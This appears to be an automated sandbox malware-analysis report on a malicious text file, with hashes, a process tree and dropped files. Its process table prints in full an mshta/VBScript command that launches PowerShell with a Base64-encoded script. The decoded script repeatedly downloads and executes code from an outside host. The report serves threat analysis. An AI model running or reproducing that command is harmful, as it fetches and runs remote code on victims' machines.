Field | Value
---|---
File name | New Text Document.txt
Full analysis | https://app.any.run/tasks/e6095610-c47c-4d37-9a48-15f545ddfdf8
Verdict | Malicious activity
Analysis date | June 27, 2022, 06:28:54
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | —
MIME | text/plain
File info | ASCII text, with very long lines, with no line terminators
MD5 | 29EA3BBF34F3D4D2BD73BBB962ED6E63
SHA1 | 015A583092A2FFB7A9893D35F27EE2F7728FA6EE
SHA256 | 2B616ABC0EC6BC1DA8EBAD1633FFCFE1BA6F057F288A6937784746A3F8083A57
SSDEEP | 12:oXKNtPNKe2Mf6kasqdnptPEn+iVtRGSBkiJfe2x9KQGWVq1SkuHD2:oXyP1f6kahJp5E7fnJe2yOVqUka2
PID | CMD | Path | Indicators | Parent process | Process details
---|---|---|---|---|---
2504 | "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\AppData\Local\Temp\New Text Document.txt" | C:\Windows\system32\NOTEPAD.EXE | — | Explorer.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Notepad; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3840 | "C:\Windows\SysWOW64\mshta.exe" mshta vbscript:createobject(wscript.shell).run(PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADgAegBrAC4AZgB1AG4ALwBpAC4AcABo | C:\Windows\SysWOW64\mshta.exe | — | Explorer.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
3936 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | Explorer.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 3221225786; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2732 | C:\Windows\SysWOW64\mshta.exe mshta vbscript:createobject(wscript.shell).run(PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADgAegBrAC4AZgB1AG4ALwBpAC4AcABoAHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACgAIgAkAGEAIgArACcAMwAnACkAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzADAADQAKAH0ADQAKAA==,0)(window.close) | C:\Windows\SysWOW64\mshta.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
3868 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 3221225786; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
3944 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Windows PowerShell; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | AC0CC66E77CEF4BC87840F85F745CCB0 | D5CE7522803DEC2362F98285FCEBBE98EF1E655B3DFC3C363364C82417636557
3868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF110378.TMP | binary | CCFCF369F751CE8DA0370D84E52A7EED | 53922490C3F5A04667EC3605A01AF2A4F4F265782D1BCA519F63ACAD413F2ED9
3868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QW22GAMEK0NA1OVX80Z5.temp | binary | AC0CC66E77CEF4BC87840F85F745CCB0 | D5CE7522803DEC2362F98285FCEBBE98EF1E655B3DFC3C363364C82417636557
3944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C05TMQIUQA3XOBEL8LRQ.temp | binary | D48DC8803C9B6EACA9E0BD2087029C89 | ED0445D07F7CFA29B7B93211AE4E05594BA7338CC821AA348DA1BE0DC66FDC19
3944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | D48DC8803C9B6EACA9E0BD2087029C89 | ED0445D07F7CFA29B7B93211AE4E05594BA7338CC821AA348DA1BE0DC66FDC19
3944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11756b.TMP | binary | AC0CC66E77CEF4BC87840F85F745CCB0 | D5CE7522803DEC2362F98285FCEBBE98EF1E655B3DFC3C363364C82417636557
3944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jlkhqtgc.q2x.ps1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3868 | powershell.exe | C:\Users\admin\AppData\Local\Temp\omi5kl10.gym.psm1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3868 | powershell.exe | C:\Users\admin\AppData\Local\Temp\y3oppvvs.5ep.ps1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3868 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | dbf | 446DD1CF97EABA21CF14D03AEBC79F27 | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF